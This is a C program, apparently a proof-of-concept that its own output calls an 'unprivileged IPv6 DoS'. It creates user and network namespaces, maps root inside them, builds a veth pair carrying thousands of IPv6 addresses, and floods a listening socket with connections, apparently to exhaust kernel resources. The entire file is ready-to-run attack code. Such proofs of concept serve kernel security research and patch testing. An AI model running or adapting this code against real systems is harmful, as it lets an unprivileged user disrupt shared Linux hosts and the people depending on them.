#include <errno.h>
#include <linux/sched.h>
#include <netinet/in.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/signal.h>
#include <stdlib.h>

int main() {
    int MAGIC = 4000;

    int setup_child = 0, server_child = 0, client_child = 0;
    int setup_status = 0, server_status = 0;
    int i = 0;
    uid_t uid;
    gid_t gid;
    FILE *fp;
    char addr[64], cmd[255], id_map[64];
    struct rlimit rl;
    int client_count = 0;

    int server = 0;
    struct sockaddr_in6 server_addr, server_client_addr;
    int server_client_len = 0;

    int client = 0;
    struct sockaddr_in6 client_src_addr, client_dst_addr;

    printf("%d: Started unprivileged IPv6 DoS\n", getpid());

    getrlimit(RLIMIT_NOFILE, &rl);
    rl.rlim_cur = rl.rlim_max;
    if (setrlimit(RLIMIT_NOFILE, &rl) < 0) {
        printf("%d: Couldn't raise rlimit\n", getpid());
        return 1;
    }

    uid = geteuid();
    gid = getegid();

    /* Start by getting our own user and network namespace */
    if (unshare(CLONE_NEWUSER|CLONE_NEWNET) < 0) {
        printf("%d: Failed to unshare: %s\n", getpid(), strerror(errno));
        return 1;
    }
    printf("%d: Unshare USER and NETWORK namespaces\n", getpid());

    sprintf(id_map, "0 %d 1\n", uid);
    fp = fopen("/proc/self/uid_map", "w+");
    if (fwrite(id_map, strlen(id_map), 1, fp) < 0) {
        printf("%d: Failed to set uid_map: %s\n", getpid(), strerror(errno));
        return 1;
    }
    fclose(fp);
    printf("%d: Mapped uid 0 to %d\n", getpid(), uid);

    sprintf(id_map, "0 %d 1\n", gid);
    fp = fopen("/proc/self/gid_map", "w+");
    if (fwrite(id_map, strlen(id_map), 1, fp) < 0) {
        printf("%d: Failed to set uid_map: %s\n", getpid(), strerror(errno));
        return 1;
    }
    fclose(fp);
    printf("%d: Mapped gid 0 to %d\n", getpid(), gid);

    /* Fork a child in the new namespace */
    setup_child = fork();
    if (setup_child < 0) {
        printf("%d: Failed to fork: %s\n", getpid(), strerror(errno));
        return 1;
    }

    void cleanup_handler(int signo) {
        printf(" %d: Received SIGINT\n", getpid());
        kill(setup_child, SIGKILL);
        kill(server_child, SIGKILL);
    }

    if (signal(SIGINT, cleanup_handler) < 0) {
        printf(" %d: Failed to setup signal handler: %s",
                getpid(), strerror(errno));
        return 1;
    }

    if (setup_child == 0) {
        printf(" %d: Started child process\n", getpid());
        if (setgid(0) < 0) {
            printf(" %d: Failed to setgid: %s\n",
                    getpid(), strerror(errno));
            return 1;
        }

        if (setuid(0) < 0) {
            printf(" %d: Failed to setgid: %s\n",
                    getpid(), strerror(errno));
            return 1;
        }

        if (setgroups(0, NULL)) {
            printf(" %d: Failed to setgroups: %s\n",
                    getpid(), strerror(errno));
            return 1;
        }

        printf(" %d: Now running as uid=%d and gid=%d in namespace\n",
                getpid(), geteuid(), getegid());

        /* Create a pair of interfaces and add a bunch of IPs */
        if (system("ip link add name veth-1 type veth peer name veth-2")) {
            printf(" %d: Failed to setup the veth pair\n", getpid());
            return 1;
        }

        if (system("ip link set dev veth-1 up")) {
            printf(" %d: Failed to bring veth-1 up\n", getpid());
            return 1;
        }

        for (i = 0; i < MAGIC; i++) {
            sprintf(cmd, "ip -6 addr add dev veth-1 9000::%d/64", i);
            system(cmd);
        }

        printf(" %d: Created veth network device with %d IPv6 addresses\n",
                getpid(), MAGIC);

        void netns_handler(int signo) {
            printf(" %d: Received SIGUSR1 from child\n", getpid());
            sprintf(cmd, "ip link set dev veth-2 netns %d", server_child);
            if (system(cmd) < 0) {
                printf(" %d: Failed to move veth-2 to child namespace.",
                        getpid());
                exit(1);
            }
            printf(" %d: Moved veth-2 to child process\n", getpid());
            kill(server_child, SIGCONT);
        }

        void client_handler(int signo) {
            printf(" %d: Received SIGUSR2 from child\n", getpid());

            printf(" %d: Opening connections to server\n", getpid());

            for (i = 0; i < MAGIC; i++) {
                client = socket(AF_INET6, SOCK_STREAM, 0);

                if (client < 0) {
                    printf(" %d: Failed to create socket: %s\n",
                            getpid(), strerror(errno));
                    exit(1);
                }

                sprintf(addr, "9000::%d", i);
                client_src_addr.sin6_family = AF_INET6;
                inet_pton(AF_INET6, addr, &client_src_addr.sin6_addr);
                client_src_addr.sin6_port = htons(9999);

                if (bind(client, (struct sockaddr *) &client_src_addr,
                            sizeof(client_src_addr)) < 0) {
                    printf(" %d: Failed to bind socket: %s\n",
                            getpid(), strerror(errno));
                    exit(1);
                }

                sprintf(addr, "9000::%d", i+MAGIC);
                client_dst_addr.sin6_family = AF_INET6;
                inet_pton(AF_INET6, addr, &client_dst_addr.sin6_addr);
                client_dst_addr.sin6_port = htons(9999);

                if (connect(client, (struct sockaddr *) &client_dst_addr,
                        sizeof(client_dst_addr)) < 0) {
                    printf(" %d: Failed to connect socket: %s\n",
                            getpid(), strerror(errno));
                    exit(1);
                }
            }

            printf(" %d: Ready. Hit ctrl+c to stop.\n", getpid());
        }

        if (signal(SIGUSR1, netns_handler) < 0) {
            printf(" %d: Failed to setup signal handler: %s",
                    getpid(), strerror(errno));
            return 1;
        }

        if (signal(SIGUSR2, client_handler) < 0) {
            printf(" %d: Failed to setup signal handler: %s",
                    getpid(), strerror(errno));
            return 1;
        }

        server_child = fork();
        if (server_child < 0) {
            printf(" %d: Failed to fork: %s\n", getpid(), strerror(errno));
            return 1;
        }

        if (server_child == 0) {
            printf("  %d: Started child process\n", getpid());

            if (unshare(CLONE_NEWNET) < 0) {
                printf("  %d: Failed to unshare NETWORK namespace: %s\n",
                        getpid(), strerror(errno));
            }

            printf("  %d: Waiting for veth-2\n", getpid());
            kill(getppid(), SIGUSR1);
            kill(getpid(), SIGSTOP);

            if (system("ip link set dev veth-2 up")) {
                printf("  %d: Failed to bring veth-2 up\n", getpid());
                return 1;
            }
            printf("  %d: Got veth-2\n", getpid());

            for (i = MAGIC; i < MAGIC * 2; i++) {
                sprintf(cmd, "ip -6 addr add dev veth-2 9000::%d/64", i);
                system(cmd);
            }

            printf(" %d: Added %d IPv6 addresses to veth-2\n",
                    getpid(), MAGIC);

            server = socket(AF_INET6, SOCK_STREAM, 0);

            if (server < 0) {
                printf("  %d: Failed to create socket: %s\n",
                        getpid(), strerror(errno));
                return 1;
            }

            server_addr.sin6_family = AF_INET6;
            server_addr.sin6_addr = in6addr_any;
            server_addr.sin6_port = htons(9999);

            if (bind(server, (struct sockaddr *) &server_addr,
                        sizeof(server_addr)) < 0) {
                printf("  %d: Failed to bind socket: %s\n",
                        getpid(), strerror(errno));
                return 1;
            }

            if (listen(server, 10000)) {
                printf("  %d: Failed to listen on socket: %s\n",
                        getpid(), strerror(errno));
                return 1;
            }

            kill(getppid(), SIGUSR2);

            printf("  %d: Listening for incoming connections\n", getpid());
            client_count = 0;
            while (1) {
                accept(server, (struct sockaddr *) &server_client_addr,
                        &server_client_len);
                client_count = client_count + 1;

                if (client_count % 500 == 0)
                    printf("  %d: Now at %d connections\n",
                            getpid(), client_count);
            }
        }

        waitpid(server_child, &server_status, 0);
        return 0;
    }

    waitpid(setup_child, &setup_status, 0);

    return 0;
}
